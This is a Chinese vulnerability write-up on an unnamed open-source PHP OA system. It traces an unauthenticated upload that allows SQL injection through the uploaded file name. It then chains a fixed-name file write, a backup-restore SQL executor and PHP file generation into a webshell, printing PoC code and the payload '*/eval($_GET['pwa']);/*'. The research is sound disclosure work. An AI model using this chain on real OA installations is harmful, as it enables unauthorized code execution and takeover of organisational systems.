某开源OA白名单后缀限制下巧用系统设计getshell

白名单后缀限制下巧用系统设计getshell

白名单后缀限制下巧用系统设计getshell

0x01 路由情况

该 OA 的 action 主要是在 webmain 目录下

image-20241212162149500

然后通过请求参数中的 dma 定位到具体的 action 中的方法进行调到

image-20241212162759549

d=systam&m=admin|admin&a=login 相当于调用 webmain/system/admin/adminAction.php#login()

而所有的 action 都会继承 mainAction,当我们请求某个 action 时首先会调用父类 mainAction__construct,进行初始化的一些操作

image-20241212163105144

其中我们发现有关鉴权的处理被子类的 initAction 所实现,比如 apiAction 中

image-20241212163352786

0x02 前台注入

2.1 代码分析

在查看 initAction 的实现时发现有个类实现该方法未存在鉴权

image-20241212164620499

且其功能点说明是上传文件,我们着重看一下怎么个事

  1. public function xxxxAction()
  2. {
  3.     if(!$_FILES)exit('sorry!');
  4.     $upimg  = c('upfile');
  5.     $maxsize= (int)$this->get('maxsize', $upimg->getmaxzhao());//上传最大M
  6.     $uptypes= 'jpg|png|docx|doc|pdf|xlsx|xls|zip|rar';
  7.     $upimg->initupfile($uptypes, ''.UPDIR.'|'.date('Y-m').'', $maxsize);
  8.     $upses  = $upimg->up('file');
  9.     if(!is_array($upses))exit($upses);
  10.     $arr    = c('down')->uploadback($upses);
  11.     $arr['autoup'] = (getconfig('qcloudCos_autoup') || getconfig('alioss_autoup')) ? 1 : 0; //是否上传其他平台
  12.     return $arr;
  13. }

该方法主要是定义了白名单上传后缀 $uptypes,调用 up 方法进行上传后返回文件信息,然后调用 uploadback,跟进到其中

  1. public function uploadback($upses, $thumbnail='', $subo=true)
  2. {
  3.     $msg        = '';
  4.     $data       = array();
  5.     if(is_array($upses)){
  7.         $fileext= substr($upses['fileext'],0,10);
  8.         $arrs   = array(
  9.             'adddt' => $this->rock->now,
  10.             'valid' => 1,
  11.             'filename'  => $this->replacefile($upses['oldfilename']),
  12.             'web'       => $this->rock->web,
  13.             'ip'        => $this->rock->ip,
  14.             'mknum'     => $this->rock->get('sysmodenum'),
  15.             //'mid'     => $this->rock->get('sysmid','0'),
  16.             'fileext'   => $fileext,
  17.             'filesize'  => (int)$this->rock->get('filesize', $upses['filesize']),
  18.             'filesizecn'=> $upses['filesizecn'],
  19.             'filepath'  => str_replace('../','',$upses['allfilename']),
  20.             'optid'     => $this->adminid,
  21.             'optname'   => $this->adminname,
  22.             'comid'     => m('admin')->getcompanyid(),
  23.         );
  24.         $arrs['filetype'] = m('file')->getmime($fileext);
  26.         //判断是不是需要压缩jpg和jpeg
  27.         ...
  29.         $bo = $this->db->record('[Q]file',$arrs);
  30.         if(!$bo)$this->reutnmsg($this->db->error());
  32.         $id = $this->db->insert_id();   
  34. }

该方法主要是通过之前 up 方法上传文件返回的数组 $upses 和全局配置信息构造 $arrs,然后调用 $this->db->record 方法操作 $arrs

来到 record 方法

  1. public function record($table,$array,$where='')
  2. {
  3.     $addbool    = true;
  4.     if(!$this->isempt($where))$addbool=false;
  5.     $cont       = '';
  6.     if(is_array($array)){
  7.         foreach($array as $key=>$val){
  8.             $cont.=",`$key`=".$this->toaddval($val)."";
  9.         }
  10.         $cont   = substr($cont,1);
  11.     }else{
  12.         $cont   = $array;
  13.     }
  14.     $table = $this->gettables($table);
  15.     if($addbool){
  16.         $sql="insert into $table set $cont";
  17.     }else{
  18.         $where = $this->getwhere($where);
  19.         $sql="update $table set $cont where $where";
  20.     }
  21.     return $this->tranbegin($sql);
  22. }

这里就直接操作 $arraykey=value 格式然后逗号拼接后带入到 SQL 语句中执行

控制了$array 中的内容就能实现 SQL 注入,而其中filenamefilepathfiletype等这几个键的内容是通过上传文件获取到的,那我们对上传文件名做文章是不是就可以造成 sql 注入呢。

  1. public function up($name,$cfile='')
  2. {
  3.     if(!$_FILES)return 'sorry!';
  4.     $file_name      = $_FILES[$name]['name'];
  5.     $file_size      = $_FILES[$name]['size'];//字节
  6.     $file_type      = $_FILES[$name]['type'];
  7.     $file_error     = $_FILES[$name]['error'];
  8.     $file_tmp_name  = $_FILES[$name]['tmp_name'];
  9.     $zongmax        = $this->getmaxupsize();    
  10.     if($file_size<=0 || $file_size > $zongmax){
  11.         return '文件为0字节/超过'.$this->formatsize($zongmax).',不能上传';
  12.     }
  13.     ...
  14.         return array(
  15.             'newfilename' => $file_newname,
  16.             'oldfilename' => $file_name,
  17.             'filesize'    => $file_size,
  18.             'filesizecn'  => $file_sizecn,
  19.             'filetype'    => $file_type,
  20.             'filepath'    => $save_path,
  21.             'fileext'     => $file_ext,
  22.             'allfilename' => $allfilename,
  23.             'picw'        => $picw,
  24.             'pich'        => $pich
  25.         );
  26.     }else{
  27.         return '上传失败:'.$this->geterrmsg($file_error).'';
  28.     }
  29. }

通过 up 方法的返回值构造可以看到 oldname 其实就是上传文件的文件名,这也证实我们的想法。

2.2 漏洞复现

image-20241213160417988

0x03 扩大危害 RCE

3.1 漏洞点

该 cms 自己实现了写入文件接口,我们查看其用法中写入

image-20241216161934097

通过这么多处调用我们发现有一处调用会写入 php 中

  1. $apaths = ''.P.'xxxx/mode_'.$modenum.'Action.php';
  2. $apath = ''.ROOT_PATH.'/'.$apaths.'';
  3. if(!file_exists($apath)){
  4.     $stra = '<?php
  5.     /**
  6.     *   此文件是【'.$modenum.'.'.$rs['name'].'】。
  7.     */ 
  8.     ....
  9.     ';
  10.     $this->rock->createtxt($apaths, $stra);
  12. }

要是我们能控制 $modenum 或是 $rs['name'] 的内容就可以 getshell,不过 $modenum 同时也控制了文件名所以我们只能通过控制 $rs['name'] 来 getshell。

  1. $setid  = (int)$this->get('setid','0');
  3. $rs     = m('flow_set')->getone("`id`='$setid'");
  4. if(!$rs)exit('sorry!');
  5. $rs['xxx'] = count(explode(',', (string)$rs['tables']));
  7. $modenum    = $rs['num'];

$rs 数组是由 flow_set 数据库获取到的,

image-20241213165334926

下面是 flow_se 默认的数据信息,要是我们可以插入或者修改数据就可以。

3.2 寻找漏洞触发点

根据常规思路我们只要寻找有插入 flow_set 表的方法即可。还真被我找到一个

  1. public function xxxAction()
  2. {
  3.     $name       = $this->rock->xssrepstr($this->post('name'));
  4.     $fields     = c('pingyin')->get($name,1);
  5.     ..
  6.     $num        = 'zz'.$fields.'';
  8.     $id         = 0;
  9.     $uarr['name'] = $name;
  10.     $uarr['num']  = $num;
  11.     $uarr['table']  = $num;
  13.     ...
  14.     $id = m('flow_set')->insert($uarr);

构造 poc,闭合前面写入文件时的注释为

  1. */eval($_GET['a']);/*

实际发现在 $this->rock->xssrepstr 中对特殊字符做了处理

  1. public function xssrepstr($str)
  2. {
  3.     $xpd  = explode(',','(,), , ,<,>,\\,*,&amp;,%,$,^,[,],{,},!,@,#,",+,?,;\'');
  4.     $xpd[]= "\n";
  5.     return str_ireplace($xpd, '', $str);
  6. }

括号之类的都被过滤点了,这个利用点看来无法利用了,那我们只能再找找有没有可以执行 SQL 语句且传参会不进行过滤的点。

通过在 web 目录下查找系统重写的 sql 执行方法 query,在某处方法中找到疑似执行任意 sql 语句的方法

  1. if(getconfig('systype')=='demo')exit();
  2. if($this->adminid!=1)return '只有ID=1的管理员才可以用';
  3. $folder = $this->post('folder');
  4. $sida   = explode(',', $this->post('sid'));
  5. $alltabls   = $this->db->getalltable();
  6. $shul   = 0;
  7. $tablss = '';
  8. foreach($sida as $id){
  9.     $ids    = substr($id,0,-5);
  10.     $ida    = explode('_', $ids);
  11.     $len    = count($ida);
  12.     $fieldshu = $ida[$len-2];
  13.     $total  = $ida[$len-1];
  14.     $tab    = str_replace('_'.$fieldshu.'_'.$total.'.json','', $id); //表
  16.     $filepath = ''.UPDIR.'/data/'.$folder.'/'.$id.'';
  17.     if(!file_exists($filepath))continue;
  19.     $data     = m('beifen')->getbfdata('',$filepath);
  20.     if(!$data)continue;
  21.     $dataarr    = $data[$tab];
  22.     //表不存在
  23.     if(!in_array($tab, $alltabls)){
  24.         $createsql = arrvalue($dataarr, 'createsql');
  25.         if($createsql){
  26.             $this->db->query($createsql, false);
  27.         }else{
  28.             continue;
  29.         }
  30.     }

在该方法中通过处理传入的 sid,获取 table 名,如果 table 名不在数据库所有表名中时,会获取某个目录下 $sid 名的文件内容作为数组并取得 createsql 的内容进行 sql 语句执行。

那么就是说如果 sid 可控文件内容,同时 sid 不在表内那么我们就能构造修改 flow_set 数据的 sql,而且目录 folder 也是可控的,似乎离成功近在咫尺了,我们找找有没有方法可以写入文件。

在用上面方法寻找文件写入的方法是我们发现好多文件名都是带了随机数,这不太好控制其位置,所以我们要找一个文件名不带随机数的写入点。

比如下面这个

  1. public function savetopdfAjax()
  2. {
  3.     $imgbase64 = $this->post('imgbase64');
  4.     if(isempt($imgbase64))return returnerror('无数据');
  5.     $path = ''.UPDIR.'/logs/'.date('Y-m').'/abc.png';
  6.     $bo = $this->rock->createtxt($path, base64_decode($imgbase64));
  7.     if(!$bo)return returnerror(''.UPDIR.'目录无写入权限');
  9.     $pa1 = ''.ROOT_PATH.'/include/fpdf/fpdf.php';
  10.     if(!file_exists($pa1))return returnerror('没有安装fpdf插件');
  11.     include_once($pa1);
  13.     $fpdf = new FPDF();
  14.     $fpdf->AddPage();
  15.     $fpdf->Image($path,0,0);
  17.     $fpdf->Output('F',''.UPDIR.'/logs/'.date('Y-m').'/to.pdf');
  18.     $this->showreturn('ok:'.$fpdf->GetPageHeight().'');
  19. }

该方法首先是根据 imgbase64 上传一个 abc.png 文件,其次是一个 pdf 文件,因为默认没这个插件所以实际发包会报错,但不影响 abc.png 上传操作的执行。

于是构造文件内容的 poc 为

  1. <?php
  2.     $arr = array(
  3.         "abc.png" => array("createsql" => "update flow_set set name=\"*\/eval($_GET\['pwa'\]);\/*\"  where id=160;")
  4.     );
  5.     echo base64_encode(json_encode($arr));

第一层数组的键为文件名,为得是符合上面方法中 $dataarr= $data[$tab] 获取到我们后面数组 $tab 其实就是传入的文件名参数。第二层数组就是实际执行的 SQL 语句,其实 id 值是默认数据库中最后一行数据的 id 值。

此方法上传的文件位置为 upload/logs/2024-12/abc.png

3.3 漏洞复现

整个过程就是

  1. savetopdfAjax 上传内容为恶意 sql 语句的图片。
  2. 请求接口触发图片内容中的恶意 SQL 语句
  3. 将更新数据表后带有 payload 的 name 值写入到 php 文件中,成功实现 getshell。

首先上传图片

image-20241216162324015

image-20241216172602175

flow_set 表中默认的数据都是存在相应的 PHP 文件的,我们得新插入一条数据进行上述操作才能生成恶意的 php 文件。

我们用之前找到的插入 flow_set 数据的接口进行插入

image-20241216171220565

此时数据表为

image-20241216171531719

记住这个 id 和 num 的值,我们根据 id 值重新生成 abc.png 的内容,然后进行恶意 sql 更新

image-20241216171828636

image-20241216172703638

通过数据表可以看到成功修改了数据表中的内容,然后我们需要触发 php 文件的写入

image-20241216172801491

找到 mode_zzmixnpgAction.php,可以看到成功写入

image-20241216172940396

因为该文件在 web 目录下所以我们可以通过系统的路由方式来访问

image-20241216173603567

可以看到成功执行代码。

  • 发表于 2025-02-25 09:33:30
  • 阅读 ( 31495 )
  • 分类:漏洞分析

2 条评论

中铁13层打工人
中铁13层打工人

79 篇文章

中铁13层打工人

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计